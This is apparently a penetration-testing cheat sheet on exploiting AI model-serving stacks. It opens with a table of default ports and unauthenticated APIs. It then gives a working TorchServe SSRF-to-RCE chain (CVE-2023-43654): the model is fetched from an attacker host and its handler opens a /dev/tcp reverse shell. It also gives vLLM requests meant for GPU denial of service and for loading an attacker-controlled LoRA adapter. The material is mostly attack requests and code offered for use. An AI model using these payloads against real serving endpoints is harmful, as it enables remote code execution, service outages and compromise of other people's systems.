TorchServe Management API (port 8081) — SSRF leading to RCE

Model Serving Exploits

Common Serving Stacks & Their Vulns

Stack	Default Port	Auth Default	Known Issues
Ollama	11434	None	Open API, RCE via model pull
vLLM	8000	None	OpenAI-compatible, unauthenticated by default
TorchServe	8080/8081	None	Management API exposed, model file RCE
Triton	8000/8001/8002	None	gRPC + HTTP, model repo traversal
text-gen-webui	7860	Optional	API mode exposes model, file system access
LocalAI	8080	None	OpenAI-compatible wrapper, full API exposure

TorchServe Exploitation (CVE-2023-43654)

# TorchServe Management API (port 8081) — SSRF leading to RCE
# CVE-2023-43654 — ShellTorchServe / ShellTorch

# Step 1: SSRF via model URL parameter
POST http://target:8081/models
Content-Type: application/json

{
  "url": "http://attacker.com/malicious.mar",  # ← SSRF point
  "model_name": "pwned",
  "initial_workers": 1
}

# Step 2: The malicious .mar file contains arbitrary Python
# executed by TorchServe during model loading

# Step 3: Python code in the MAR handler runs on TorchServe server:
# handler.py (malicious)
import os
os.system("bash -i >& /dev/tcp/attacker.com/4444 0>&1")  # reverse shell

vLLM Configuration Attacks

# vLLM exposes OpenAI-compatible API
# Default: no authentication

# List available models
GET http://target:8000/v1/models

# Query with custom sampling params (resource exhaustion)
POST http://target:8000/v1/completions
{
  "model": "llama-3-70b",
  "prompt": "Write a very long story",
  "max_tokens": 32000,         # max tokens → GPU resource exhaustion
  "n": 100                     # 100 parallel completions → DoS
}

# LoRA model switching (if enabled)
POST http://target:8000/v1/completions
{
  "model": "llama-3-70b",
  "prompt": "...",
  "lora_name": "attacker-controlled-lora"  # ← load attacker's LoRA
}